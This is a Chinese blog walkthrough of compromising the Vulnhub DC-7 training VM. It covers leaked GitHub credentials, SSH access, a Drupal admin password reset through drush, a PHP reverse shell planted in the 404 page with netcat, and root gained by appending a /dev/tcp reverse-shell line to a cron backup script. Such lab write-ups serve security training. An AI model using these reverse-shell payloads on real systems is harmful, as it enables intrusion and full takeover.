[Vulnhub] DC-7靶机渗透

本文详述了一次渗透测试的过程,从环境搭建开始,通过端口扫描和Web服务分析,利用GitHub源码泄露获取敏感信息,SSH远程登录,数据库信息挖掘,Web后台密码篡改,再到反弹shell和提权,最终获取目标系统的完全控制。整个过程突显了信息收集和安全防护的重要性。
摘要由CSDN通过智能技术生成

0x00 环境搭建

靶机地址:http://www.vulnhub.com/entry/dc-7,356/
下载之后用vmware打开即可,使用桥接模式。
开机后搭建完成:
在这里插入图片描述
本关只有一个flag,并提示了暴力破解不会成功。


0x01 主机端口探测

arp-scan -l探测内网存活主机,再用nmap -sV -p- ip来探测端口:
在这里插入图片描述
发现开启了80端口(HTTP服务)和22端口(SSH服务)


0x02 web渗透

访问80端口,发现是一个 Drupal 搭建的站:
在这里插入图片描述
目录扫描和 xray 扫了一下没发现什么利用点,查找CMS通杀漏洞,发现存在RCE,测试后也无法利用。

发现页面提示开发者是@DC7USER
在这里插入图片描述
查找相关信息发现 github 仓库:
在这里插入图片描述
在配置文件中发现数据库的账户密码:
在这里插入图片描述


0x03 SSH远程登录

用刚才的数据库账户密码发现可以SSH登录:
在这里插入图片描述
查看当前目录下的 mbox 文件,像是计划任务的执行日志记录,每15分钟执行一次backup.sh
在这里插入图片描述
查看这个脚本文件,发现该系统安装了drupal管理工具drush,并得到gpg加密密码:PickYourOwnPassword
在这里插入图片描述
解密文件: gpg -d website.tar.gz.gpg > website.tar.gz,在setting.php文件中发现数据库信息(别问,问就是之前那个数据库密码只能连ssh不能登录数据库):
在这里插入图片描述
连接数据库,找到用户名密码:
在这里插入图片描述
解密失败,用drush命令修改用户密码:drush user-password admin --password="hacker"
在这里插入图片描述
成功登录后台:
在这里插入图片描述


0x04 反弹shell

找到上传点,无法直接上传shell:
在这里插入图片描述
查询后得知需要加载php模块:
在这里插入图片描述
安装成功,勾选上:
在这里插入图片描述在这里插入图片描述
修改404页面:<?php system("nc 192.168.1.143 4444 -e /bin/bash");?>
在这里插入图片描述
攻击机监听得到反弹shell:
在这里插入图片描述


0x05 提权

修改备份脚本写入计划任务:echo "bash -i >& /dev/tcp/10.10.10.244/4444 0>&1" >> /opt/scripts/backups.sh
在这里插入图片描述
等待root执行计划任务,获得shell:
在这里插入图片描述


总结

主机发现 => 端口扫描 => 访问web服务 => gihub源码泄露 => ssh远程登录 => 发现数据库信息 => 得知用户名 => 修改用户密码 => 登录web页面 => 修改页面源码反弹shell => 找到flag

再次体现了信息泄露的危害和信息收集的重要性


参考链接:
https://www.cnblogs.com/chalan630/p/14185843.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值